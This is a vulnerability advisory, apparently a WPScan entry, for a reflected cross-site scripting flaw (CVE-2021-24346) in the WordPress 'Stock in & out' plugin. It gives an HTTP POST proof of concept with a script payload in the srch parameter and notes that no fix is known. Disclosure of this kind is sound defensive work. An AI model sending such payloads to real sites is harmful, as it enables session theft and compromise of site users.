Stock in & out <= 1.0.4 – Reflected Cross-Site Scripting (XSS) | CVE 2021-24346 | Plugin Vulnerabilities

Description

The plugin has a search functionality, the lowest accessible level to it being contributor. The srch POST parameter is not validated, sanitised or escaped before using it in the echo statement, leading to a reflected XSS issue

Proof of Concept

POST /wp-admin/admin.php?page=stock_in HTTP/1.1
Content-Length: 66
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: [contributor+]
Connection: close

srch=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search=Search+Product

Affects Plugins

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-stock-in/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

c25146fd-4143-463c-8c85-05dd33e9a77b

Timeline

Publicly Published

2021-05-27 (about 4 years ago)

Added

2021-05-27 (about 4 years ago)

Last Updated

2021-05-28 (about 4 years ago)

Other

Published

Title

Published

2023-04-19

Title

Subscribers - Free Web Push Notifications < 1.5.4 - Admin+ Stored XSS

Published

2025-09-05

Title

Zoomify embed for WP <= 1.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-09-12

Title

WP Meta SEO < 4.5.14 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-17

Title

Uncode < 2.9.1.7 - Authenticated (Subscriber+) Stored Cross-Site Scripting via mle-description

Published

2024-10-25

Title

Editor Custom Color Palette < 3.3.8 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload